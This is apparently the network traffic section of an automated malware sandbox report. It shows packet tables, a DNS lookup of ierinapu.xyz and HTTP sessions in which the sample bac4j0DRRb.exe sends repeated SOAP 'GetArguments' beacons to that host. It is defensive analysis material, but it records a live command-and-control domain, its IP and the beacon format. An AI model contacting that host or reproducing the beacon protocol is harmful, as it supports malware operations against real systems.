Oct 20, 2024 21:03:11.185074091 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:11.532819033 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:11.537678957 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:12.946690083 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:12.946702957 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:12.946777105 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:12.946789026 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:12.946830988 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:12.946914911 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:12.949387074 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:12.949450016 CEST	49961	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:12.951812029 CEST	80	49961	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:13.955315113 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:13.960316896 CEST	80	49974	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:13.960407972 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:13.960597992 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:13.965642929 CEST	80	49974	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:14.314140081 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:14.319083929 CEST	80	49974	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:15.499345064 CEST	80	49974	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:15.499362946 CEST	80	49974	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:15.499425888 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:15.499712944 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:15.504856110 CEST	80	49974	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:15.504920959 CEST	49974	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:16.501908064 CEST	49987	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:16.506892920 CEST	80	49987	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:16.507083893 CEST	49987	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:16.507194042 CEST	49987	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:16.512670994 CEST	80	49987	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:16.860898018 CEST	49987	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:16.866350889 CEST	80	49987	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:18.051305056 CEST	80	49987	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:18.051435947 CEST	49987	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:18.051549911 CEST	49987	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:18.056303978 CEST	80	49987	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:19.065217972 CEST	49999	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:19.070163965 CEST	80	49999	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:19.070280075 CEST	49999	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:19.070477009 CEST	49999	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:19.075272083 CEST	80	49999	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:19.423474073 CEST	49999	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:19.428493977 CEST	80	49999	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:20.609499931 CEST	80	49999	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:20.609574080 CEST	49999	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:20.609680891 CEST	49999	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:20.614526033 CEST	80	49999	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:21.611409903 CEST	50007	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:21.616755962 CEST	80	50007	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:21.618464947 CEST	50007	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:21.618640900 CEST	50007	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:21.623640060 CEST	80	50007	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:21.970757961 CEST	50007	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:21.975645065 CEST	80	50007	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:23.164999962 CEST	80	50007	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:23.165100098 CEST	50007	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:23.165314913 CEST	50007	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:23.170416117 CEST	80	50007	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:24.173836946 CEST	50008	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:24.283544064 CEST	80	50008	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:24.283636093 CEST	50008	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:24.283757925 CEST	50008	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:24.288645983 CEST	80	50008	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:24.642189026 CEST	50008	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:24.647473097 CEST	80	50008	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:25.818999052 CEST	80	50008	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:25.819072962 CEST	50008	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:25.819344997 CEST	50008	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:25.824208975 CEST	80	50008	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:26.830274105 CEST	50009	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:26.835202932 CEST	80	50009	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:26.835309029 CEST	50009	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:26.835433960 CEST	50009	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:26.840205908 CEST	80	50009	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:27.189223051 CEST	50009	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:27.194042921 CEST	80	50009	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:28.382339001 CEST	80	50009	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:28.382549047 CEST	50009	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:28.382659912 CEST	50009	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:28.387953997 CEST	80	50009	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:29.392774105 CEST	50010	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:29.398499012 CEST	80	50010	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:29.398623943 CEST	50010	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:29.398751020 CEST	50010	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:29.404202938 CEST	80	50010	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:29.751642942 CEST	50010	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:29.756635904 CEST	80	50010	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:30.947282076 CEST	80	50010	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:30.947354078 CEST	50010	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:30.947525024 CEST	50010	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:30.952267885 CEST	80	50010	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:31.924515963 CEST	50011	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:31.929514885 CEST	80	50011	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:31.931504011 CEST	50011	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:31.931746006 CEST	50011	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:31.936533928 CEST	80	50011	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:32.282896996 CEST	50011	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:32.287753105 CEST	80	50011	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:33.463239908 CEST	80	50011	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:33.463359118 CEST	50011	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:33.463449955 CEST	50011	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:33.468288898 CEST	80	50011	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:34.414802074 CEST	50012	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:34.419842958 CEST	80	50012	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:34.419965029 CEST	50012	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:34.421329975 CEST	50012	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:34.426166058 CEST	80	50012	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:34.767177105 CEST	50012	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:34.772106886 CEST	80	50012	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:35.962717056 CEST	80	50012	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:35.962806940 CEST	50012	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:35.963058949 CEST	50012	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:35.967822075 CEST	80	50012	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:36.877471924 CEST	50013	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:36.887413025 CEST	80	50013	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:36.887687922 CEST	50013	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:36.887742043 CEST	50013	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:36.892716885 CEST	80	50013	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:37.236094952 CEST	50013	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:37.240993023 CEST	80	50013	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:38.421133041 CEST	80	50013	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:38.421417952 CEST	50013	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:38.421561003 CEST	50013	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:38.428845882 CEST	80	50013	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:39.299372911 CEST	50014	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:39.304850101 CEST	80	50014	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:39.304933071 CEST	50014	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:39.305103064 CEST	50014	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:39.309957027 CEST	80	50014	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:39.657978058 CEST	50014	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:39.663026094 CEST	80	50014	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:40.843058109 CEST	80	50014	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:40.843149900 CEST	50014	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:40.843239069 CEST	50014	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:40.849812031 CEST	80	50014	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:41.690673113 CEST	50015	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:41.695619106 CEST	80	50015	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:41.695694923 CEST	50015	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:41.695796967 CEST	50015	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:41.700534105 CEST	80	50015	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:42.048417091 CEST	50015	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:42.053425074 CEST	80	50015	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:43.250096083 CEST	80	50015	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:43.250308037 CEST	50015	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:43.250343084 CEST	50015	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:43.255348921 CEST	80	50015	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:44.080229044 CEST	50016	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:44.087904930 CEST	80	50016	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:44.088006020 CEST	50016	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:44.088260889 CEST	50016	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:44.093076944 CEST	80	50016	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:44.439193010 CEST	50016	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:44.444025993 CEST	80	50016	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:45.617157936 CEST	80	50016	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:45.617722988 CEST	80	50016	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:45.617805958 CEST	50016	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:45.617949009 CEST	50016	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:45.623665094 CEST	80	50016	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:46.408354044 CEST	50017	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:46.413346052 CEST	80	50017	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:46.413511992 CEST	50017	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:46.413619041 CEST	50017	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:46.418562889 CEST	80	50017	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:46.767276049 CEST	50017	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:46.772269964 CEST	80	50017	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:47.951793909 CEST	80	50017	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:47.952099085 CEST	50017	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:47.957482100 CEST	80	50017	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:47.957546949 CEST	50017	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:48.720834970 CEST	50018	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:48.726191998 CEST	80	50018	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:48.726300955 CEST	50018	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:48.726480007 CEST	50018	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:48.732970953 CEST	80	50018	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:49.079709053 CEST	50018	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:49.084903955 CEST	80	50018	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:50.270091057 CEST	80	50018	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:50.270234108 CEST	50018	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:50.270327091 CEST	50018	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:50.275309086 CEST	80	50018	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:51.018227100 CEST	50019	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:51.023188114 CEST	80	50019	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:51.023307085 CEST	50019	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:51.023456097 CEST	50019	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:51.028367043 CEST	80	50019	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:51.376565933 CEST	50019	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:51.381531954 CEST	80	50019	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:52.566546917 CEST	80	50019	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:52.569756031 CEST	50019	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:52.569880009 CEST	50019	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:52.574723005 CEST	80	50019	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:53.283566952 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:53.485446930 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:53.485706091 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:53.485963106 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:53.490839005 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:53.845417023 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:54.314064026 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:54.739728928 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:54.739769936 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:55.061579943 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:55.110950947 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:55.284759998 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:55.284888983 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:55.284955025 CEST	50020	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:55.289789915 CEST	80	50020	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:55.986399889 CEST	50021	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:55.991679907 CEST	80	50021	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:55.991756916 CEST	50021	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:55.991940022 CEST	50021	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:55.996778965 CEST	80	50021	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:56.345400095 CEST	50021	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:56.350722075 CEST	80	50021	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:57.549776077 CEST	80	50021	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:57.550012112 CEST	50021	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:57.550012112 CEST	50021	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:57.556555986 CEST	80	50021	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:58.221013069 CEST	50022	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:58.226068974 CEST	80	50022	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:58.226157904 CEST	50022	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:58.226347923 CEST	50022	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:58.231705904 CEST	80	50022	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:58.579844952 CEST	50022	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:58.584985971 CEST	80	50022	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:59.765558004 CEST	80	50022	18.141.10.107	192.168.2.5
Oct 20, 2024 21:03:59.765805006 CEST	50022	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:59.765870094 CEST	50022	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:03:59.770947933 CEST	80	50022	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:00.424273014 CEST	50023	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:00.429759026 CEST	80	50023	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:00.429914951 CEST	50023	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:00.430083036 CEST	50023	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:00.434964895 CEST	80	50023	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:00.782895088 CEST	50023	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:00.788395882 CEST	80	50023	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:01.975008965 CEST	80	50023	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:01.975924015 CEST	80	50023	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:01.976011992 CEST	50023	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:01.978970051 CEST	50023	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:01.983863115 CEST	80	50023	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:02.612062931 CEST	50024	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:02.617163897 CEST	80	50024	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:02.617279053 CEST	50024	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:02.617428064 CEST	50024	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:02.622318029 CEST	80	50024	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:02.970566034 CEST	50024	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:02.975584984 CEST	80	50024	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:04.159750938 CEST	80	50024	18.141.10.107	192.168.2.5
Oct 20, 2024 21:04:04.159964085 CEST	50024	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:04.162513018 CEST	50024	80	192.168.2.5	18.141.10.107
Oct 20, 2024 21:04:04.167427063 CEST	80	50024	18.141.10.107	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 21:02:04.064412117 CEST	59282	53	192.168.2.5	1.1.1.1
Oct 20, 2024 21:02:04.254467010 CEST	53	59282	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 20, 2024 21:02:04.064412117 CEST	192.168.2.5	1.1.1.1	0x89a6	Standard query (0)	ierinapu.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 20, 2024 21:02:04.254467010 CEST	1.1.1.1	192.168.2.5	0x89a6	No error (0)	ierinapu.xyz		18.141.10.107	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ierinapu.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:04.283566952 CEST	233	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Oct 20, 2024 21:02:04.642263889 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:07.195065022 CEST	233	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Oct 20, 2024 21:02:07.548538923 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:08.741961956 CEST	25	IN	HTTP/1.1 100 Continue
Oct 20, 2024 21:02:08.742005110 CEST	464	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 19:02:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3fc8f4b8b485330a316acb614ba5e5a4\|96.44.151.125\|1729450928\|1729450928\|0\|1\|0; path=/; domain=.ierinapu.xyz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:09.788760900 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:10.142242908 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:02:11.348874092 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:12.958386898 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:02:13.314109087 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:02:15.562393904 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
